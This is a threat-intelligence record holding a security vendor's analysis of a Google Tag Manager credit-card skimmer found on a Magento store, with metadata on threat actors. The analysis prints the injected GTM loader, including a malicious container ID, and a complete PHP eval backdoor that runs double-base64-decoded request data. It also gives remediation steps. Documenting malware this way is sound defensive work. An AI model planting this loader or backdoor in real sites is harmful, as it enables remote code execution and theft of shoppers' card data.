{ "id": "d427a1c8-b906-414a-83b3-d6ce9ee79241", "created_at": "2026-04-06T00:06:56.440765Z", "updated_at": "2026-04-10T03:24:11.836384Z", "deleted_at": null, "sha1_hash": "bea3c1e9bf89592ff4a32953708cace24081c354", "title": "Google Tag Manager Skimmer Steals Credit Card Info From Magento Site", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2410274, "plain_text": "Google Tag Manager Skimmer Steals Credit Card Info From\r\nMagento Site\r\nBy Puja Srivastava\r\nPublished: 2025-02-06 · Archived: 2026-04-05 13:42:28 UTC\r\nAt Sucuri, we are committed to protecting websites from malware and other cyber threats. Recently, we were\r\ncontacted by a customer who had experienced credit card data theft from their Magento-based eCommerce\r\nwebsite. After an extensive investigation, we were able to trace the malware responsible for what was happening\r\nback to the Google Tag Manager script and assist in restoring the site’s security. We have detailed a previous\r\nsimilar infection here Malicious Activities with Google Tag Manager.\r\nWhat was noticed?\r\nThe customer reached out to us with a concerning issue: they had discovered that sensitive customer data,\r\nspecifically credit card details, was being stolen from their Magento site. This type of breach is especially\r\ntroubling because it can lead to financial losses, loss of customer trust, and significant damage to the website’s\r\nreputation.\r\nWhat is a Google Tag Manager?\r\nGoogle Tag Manager (GTM) is a free tool from Google that allows website owners to manage and deploy\r\nmarketing tags on their website without needing to modify the site’s code directly. It simplifies the process of\r\nadding and updating tags for things like Google Analytics, AdWords, Facebook Pixel, and more, making it easier\r\nfor marketers to track website activity and optimize campaigns without involving developers every time a change\r\nis needed.\r\n\u003cscript\u003ehttp://www.googletagmanager.com/gtm.js?id=GTM-'ID'\u003c/script\u003e\r\nThe \u003cscript\u003e tag loads the Google Tag Manager (GTM) JavaScript file, allowing you to manage and deploy\r\ntags on your website using the specified GTM container ID (GTM-ID).\r\nTracing the Source of the Malware\r\nDuring our investigation, we performed a deep dive into the website’s files, checking for any suspicious or\r\nunfamiliar code. It wasn’t long before we identified that the malware was being loaded from the database table\r\ncms_block.content .\r\n\u003cimg src=\"google-manager.png\" onerror=\"(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':\r\nnew Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],\r\nj=d.createElement(s),dl=l!='dataLayer'?'\u0026l='+l:'';j.async=true;j.src=\r\nhttps://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html\r\nPage 1 of 5\n\n'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);\r\n})(window,document,'script','dataLayer','GTM-MLHK2N68');\"\u003e\r\n\u003cscript\u003e(function(i, s, h, k, l, o, c, m) {m['GoogleAnalyticsObjects'] = o; c = s.createElement(h), i\r\nAt first glance, this code appears to be a standard Google Tag Manager (GTM) and Google Analytics tracking\r\nscript, which is often used for website analytics and advertising purposes. However, closer examination revealed\r\nthat this code was not used for legitimate tracking but was instead malicious in nature.\r\nNew Findings and Ongoing Threats\r\nIn 2024, we published an article detailing how Magecart veteran ATMZOW was found using Google Tag Manager\r\nfor delivering malware. This new infection indicates that the tactic is still being widely used by attackers, this time\r\nflagged by SiteCheck under the names:\r\nmalware.magento_shoplift?71.5\r\nmalware.magento_shoplift.171.51\r\nmalware.magento_shoplift.171.52\r\nDuring our investigation, we also uncovered a backdoor located in ./media/index.php. This backdoor could have\r\nbeen exploited to further infect the site, providing attackers with persistent access. Here is the backdoor code we\r\nfound:\r\nfunction get_data($param, $default) {\r\n $total = $_REQUEST;\r\n if(isset($total[$param])) {\r\n return $total[$param];\r\n } else {\r\n return $default;\r\n }\r\n}\r\nfunction get_cli() {\r\n if( strpos(hash(\"sha256\", get_data(\"item\", \"\")), \"5a2c75360f3ff123\") === false )\r\n return \"\";\r\n $param_name = \"order\";\r\nhttps://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html\r\nPage 2 of 5\n\n$data = get_data($param_name, \"\");\r\n $cli = base64_decode($data);\r\n $cli = base64_decode($cli);\r\n return $cli;\r\n}\r\n$cli = get_cli();\r\nreturn eval($cli);\r\nAt the time of writing this article, we found that at least 6 websites were currently infected with this particular\r\nGoogle Tag Manager ID, indicating that this threat is actively affecting multiple sites.\r\nHere’s the source-code of the site where the Google Tag Manager ID is shown:\r\nDomain included\r\neurowebmonitortool[.]com is used in this malicious campaign and is currently blocklisted by 15 security vendors\r\nat VirusTotal.\r\nHow the Malware Functioned\r\nWithin the GTM tag, there was an encoded JavaScript payload that acted as a credit card skimmer. This script was\r\ndesigned to collect sensitive data entered by users during the checkout process and send it to a remote server\r\ncontrolled by the attackers.\r\nOnce executed, the malware would steal credit card information from the checkout pages and send it to an\r\nexternal server.\r\nMalicious GTM Content: GTM-MLHK2N68\r\nThe function _0x5cdc is an obfuscation technique. It maps index values to specific characters in the array,\r\nmaking it difficult for someone to immediately understand the purpose of the script.\r\nhttps://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html\r\nPage 3 of 5\n\nThe script also uses a series of mathematical operations (parseInt, shift) in a loop, further scrambling the code.\r\nThe string d2luZG93Lnd3 is Base64 encoded, which decodes to window.www . This is part of a larger encoded\r\nstring that leads to the loading of the Google Analytics script from www.google-analytics.com .\r\nThis is a trick often used by attackers to disguise the true purpose of the script.\r\nThe script injects a modified version of the Google Analytics script (analytics.js) by calling it through a\r\ndynamically created \u003cscript\u003e tag.\r\nThe function eval() is used at the end of the script to execute the decoded and manipulated payload, which likely\r\nperforms malicious actions, such as exfiltrating sensitive information.\r\nThe final payload of this script is a hidden credit card skimmer, which collects data such as credit card details\r\nentered during checkout and sends it to the attacker’s remote server.\r\nHow We Remedied the Situation\r\nOnce we identified the source of the malware, we removed the malicious code from the cms_block.content\r\ntable and any other compromised areas of the site.\r\nWe also cleaned up the obfuscated script and the backdoor to prevent the malware from being reintroduced.\r\nConclusion\r\nThis GTM-based attack demonstrates the sophistication of modern malware, utilizing legitimate platforms like\r\nGoogle Tag Manager to deploy malicious code. The obfuscation and encoding techniques make it particularly\r\nchallenging to detect, requiring deep investigation to uncover its true purpose.\r\nhttps://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html\r\nPage 4 of 5\n\nStay on the safe side and investigate any scripts you find strange or unfamiliar. Remain critical of any scripts that\r\nweren’t placed by a website administrator, they may be a sign of potential compromise. It’s critical to perform a\r\nthorough audit if you suspect your website is infected and clean up any suspicious tags or scripts to prevent further\r\ndata theft.\r\nRemediation Steps\r\nTo remediate the Google Tag Manager-based malware:\r\n1. Remove any suspicious GTM tags. Log into GTM, identify, and delete any suspicious tags.\r\n2. Perform a full website scan to detect any other malware or backdoors.\r\n3. Remove any malicious scripts or backdoor files.\r\n4. Ensure Magento and all extensions are up-to-date with security patches.\r\n5. Regularly monitor site traffic and GTM for any unusual activity.\r\nSource: https://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html\r\nhttps://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html" ], "report_names": [ "google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed", "created_at": "2023-01-06T13:46:38.814104Z", "updated_at": "2026-04-10T02:00:03.110104Z", "deleted_at": null, "main_name": "MageCart", "aliases": [], "source_name": "MISPGALAXY:MageCart", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434016, "ts_updated_at": 1775791451, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bea3c1e9bf89592ff4a32953708cace24081c354.pdf", "text": "https://archive.orkl.eu/bea3c1e9bf89592ff4a32953708cace24081c354.txt", "img": "https://archive.orkl.eu/bea3c1e9bf89592ff4a32953708cace24081c354.jpg" } }